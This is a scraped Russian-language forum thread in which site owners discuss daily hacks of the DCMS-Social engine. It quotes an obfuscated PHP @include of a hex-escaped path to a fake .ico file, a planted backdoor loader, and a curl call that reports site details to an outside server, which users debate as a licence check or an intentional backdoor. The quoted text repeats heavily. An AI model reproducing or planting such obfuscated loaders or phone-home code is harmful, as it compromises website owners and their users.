Добро пожаловать, Гость!
Тема закрыта для обсуждения
Взлом - Страница 2
Архив закрытых тем | Взлом
Desvi :
Поставил последнюю версию социала, взламывают каждый день, задолбался чистить индексы от кода.
двиг уязвим как я понял.
<?php
/*538c7*/
@include "x2fvx61rx2fwx77wx2fkx61vx6bax7aax72ux2fdx61tx61/x77wx77/x6bax76kx61zx61.x72ux2fsx74yx6cex2fax76tx6frx69tx65tx2ffx61vx69cx6fnx5f4x34ex37bx37.x69cx6f";
/*538c7*/
?>
Взлом
3 Янв 2018Поставил последнюю версию социала, взламывают каждый день, задолбался чистить индексы от кода.
двиг уязвим как я понял.
<?php
/*538c7*/
@include "x2fvx61rx2fwx77wx2fkx61vx6bax7aax72ux2fdx61tx61/x77wx77/x6bax76kx61zx61.x72ux2fsx74yx6cex2fax76tx6frx69tx65tx2ffx61vx69cx6fnx5f4x34ex37bx37.x69cx6f";
/*538c7*/
?>
Комментарии:
DoR 27 Фев 2018
Скиталец, если ты настолько упрям, я покажу насколько ты далёк.
Откинув проверки берём рабочее.
curl_setopt($ch, CURLOPT_URL, 'http://dcms-social.ru/curl.php?site=' . $_SERVER['HTTP_HOST'] . '&version=' . $set['dcms_version'] . '&title=' . $set['title']);
Из чего имеет $_SERVER['HTTP_HOST'] - адрес сайта.
И параметры: $set['dcms_version'] и $set['title'] извлекающие
данные из файла settings_6.2.dat(где данные от бд)
и отправляем это на социал, в файл curl.php
И казалось бы всё, получил социал запрос(стучалка) сохранил где то, закрой соединение и забудь.
Но вместо этого, почему то, мы получаем ответ от социала
$data = curl_exec($ch);
который сливается в $data, и растворяется где то в лабиринтах двига))
И только после закрываем соединение curl_close($ch);
Уже твоя теория потерпела крах!
И так что же мы имеем только копнув(на поверхности)
Общение двух серверов посредством 80 порта.
И если думаешь, социал может ответить лишь безобидным HELO.
Могу продолжить)) Но один вопрос, зачем мне это, ведь ты же крут))
Скиталец, если ты настолько упрям, я покажу насколько ты далёк.
Откинув проверки берём рабочее.
curl_setopt($ch, CURLOPT_URL, 'http://dcms-social.ru/curl.php?site=' . $_SERVER['HTTP_HOST'] . '&version=' . $set['dcms_version'] . '&title=' . $set['title']);
Из чего имеет $_SERVER['HTTP_HOST'] - адрес сайта.
И параметры: $set['dcms_version'] и $set['title'] извлекающие
данные из файла settings_6.2.dat(где данные от бд)
и отправляем это на социал, в файл curl.php
И казалось бы всё, получил социал запрос(стучалка) сохранил где то, закрой соединение и забудь.
Но вместо этого, почему то, мы получаем ответ от социала
$data = curl_exec($ch);
который сливается в $data, и растворяется где то в лабиринтах двига))
И только после закрываем соединение curl_close($ch);
Уже твоя теория потерпела крах!
И так что же мы имеем только копнув(на поверхности)
Общение двух серверов посредством 80 порта.
И если думаешь, социал может ответить лишь безобидным HELO.
Могу продолжить)) Но один вопрос, зачем мне это, ведь ты же крут))
Скиталец 26 Фев 2018
Добавлено:
Angelok0803, да не слушай ты его,
это обычная инициализация сеанса curl ничего уязвимого там нет, даже написано верно, все подчистили после выполнения.
DoR (22 Фев 2018):
Zed, Из тебя кодер как и меня бургамистр
Это и есть уявимость, осознано сделанная.
Не говори чего не знаешь!
DoR, ради бога поясни мне убогому двоешнику что же такого уязвимого в этом коде? Я лично ничего опсного там невижу... Может ты все таки бургамистр?Zed, Из тебя кодер как и меня бургамистр
Это и есть уявимость, осознано сделанная.
Не говори чего не знаешь!
Добавлено:
Angelok0803, да не слушай ты его,
это обычная инициализация сеанса curl ничего уязвимого там нет, даже написано верно, все подчистили после выполнения.
Angelok0803 26 Фев 2018
DoR (22 Фев 2018):
Zed, Из тебя кодер как и меня бургамистр
Это и есть уявимость, осознано сделанная.
Не говори чего не знаешь!
DoR, НЕт словZed, Из тебя кодер как и меня бургамистр
Это и есть уявимость, осознано сделанная.
Не говори чего не знаешь!
DoR 22 Фев 2018
Это и есть уявимость, осознано сделанная.
Не говори чего не знаешь!
Zed (4 Янв 2018):
Parviz, это проверка на лицензию вроде
Zed, Из тебя кодер как и меня бургамистрParviz, это проверка на лицензию вроде
Это и есть уявимость, осознано сделанная.
Не говори чего не знаешь!
Zed 4 Янв 2018
Parviz (4 Янв 2018):
Юрий, а у меня нет такого файла...
Добавлено:
этот код по моему php инъекции, хацкер инклюдировал ico файл и файл работал как php.
а вот код откуда появляется хз. на всякий случай убери код из sys/inc/fnc.php
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://dcms-social.ru/curl.php?site=' . $_SERVER['HTTP_HOST'] . '&version=' . $set['dcms_version'] . '&title=' . $set['title']);
$data = curl_exec($ch);
curl_close($ch);}
Parviz, это проверка на лицензию вродеЮрий, а у меня нет такого файла...
Добавлено:
этот код по моему php инъекции, хацкер инклюдировал ico файл и файл работал как php.
а вот код откуда появляется хз. на всякий случай убери код из sys/inc/fnc.php
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://dcms-social.ru/curl.php?site=' . $_SERVER['HTTP_HOST'] . '&version=' . $set['dcms_version'] . '&title=' . $set['title']);
$data = curl_exec($ch);
curl_close($ch);}